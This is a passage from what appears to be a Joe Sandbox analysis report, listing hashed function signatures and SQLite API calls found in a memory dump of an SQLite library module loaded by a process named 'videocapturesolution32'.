                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                          • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                          • String ID:
                                                          • API String ID: 251237202-0
                                                          • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                          • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                          • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                          • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: ($string or blob too big$|
                                                          • API String ID: 632333372-2398534278
                                                          • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                          • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                          • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                          • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                          APIs
                                                          • sqlite3_stricmp.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6094E8D4), ref: 60923675
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_stricmp
                                                          • String ID: BINARY
                                                          • API String ID: 912767213-907554435
                                                          • Opcode ID: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                          • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                          • Opcode Fuzzy Hash: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                          • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$Query
                                                          • String ID: @
                                                          • API String ID: 3618607426-2766056989
                                                          • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                          • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                          • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                          • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                          APIs
                                                          • sqlite3_malloc.SQLITE3 ref: 60928353
                                                            • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                          • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                          • sqlite3_free.SQLITE3 ref: 609283B6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                          • String ID: d
                                                          • API String ID: 211589378-2564639436
                                                          • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                          • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                          • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                          • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                          • API String ID: 1646373207-2713375476
                                                          • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                          • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                          • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                          • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free
                                                          • String ID:
                                                          • API String ID: 2313487548-0
                                                          • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                          • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                          • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                          • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                          • API String ID: 0-1177837799
                                                          • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                          • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                          • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                          • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_leave$sqlite3_logsqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 4249760608-0
                                                          • Opcode ID: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
                                                          • Instruction ID: 2374180173898b37ca3bb3ba1fa7e33799c7e45bceefb220d1965ad168ba1add
                                                          • Opcode Fuzzy Hash: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
                                                          • Instruction Fuzzy Hash: 7F412970A083048BE701DF6AC495B8ABBF6FFA5308F04C46DE8598B355D779D849CB91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 1648232842-0
                                                          • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                          • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                          • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                          • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                          APIs
                                                          • sqlite3_step.SQLITE3 ref: 609614AB
                                                          • sqlite3_reset.SQLITE3 ref: 609614BF
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 3429445273-0
                                                          • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                          • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                          • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                          • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 1035992805-0
                                                          • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                          • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                          • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                          • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                          • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                          • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                          • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1477753154-0
                                                          • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                          • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                          • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                          • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                          APIs
                                                          • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                          • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 2673540737-0
                                                          • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                          • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                          • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                          • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                          • String ID:
                                                          • API String ID: 3526213481-0
                                                          • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                          • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                          • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                          • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                          APIs
                                                          • sqlite3_prepare.SQLITE3 ref: 60969166
                                                          • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                            • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                          • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                            • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                          • sqlite3_step.SQLITE3 ref: 60969197
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                          • String ID:
                                                          • API String ID: 2877408194-0
                                                          • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                          • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                          • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                          • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                          • String ID:
                                                          • API String ID: 1163609955-0
                                                          • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                          • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                          • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                          • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                          APIs
                                                          • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                          • sqlite3_step.SQLITE3 ref: 609615C9
                                                          • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                            • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                          • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                           • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                          • String ID:
                                                          • API String ID: 4265739436-0
                                                          • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
